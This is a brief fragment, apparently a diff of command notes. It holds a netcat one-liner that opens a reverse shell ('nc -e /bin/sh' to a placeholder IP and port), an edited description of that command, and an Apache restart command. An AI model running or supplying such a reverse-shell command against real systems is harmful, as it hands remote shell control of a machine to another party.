 nc -e /bin/sh [IP] [Port]

-Connecting to netcat service running on other system and open the reverse shell
+Connecting to netcat service running on other system and open

 /etc/init.d/apache2 restart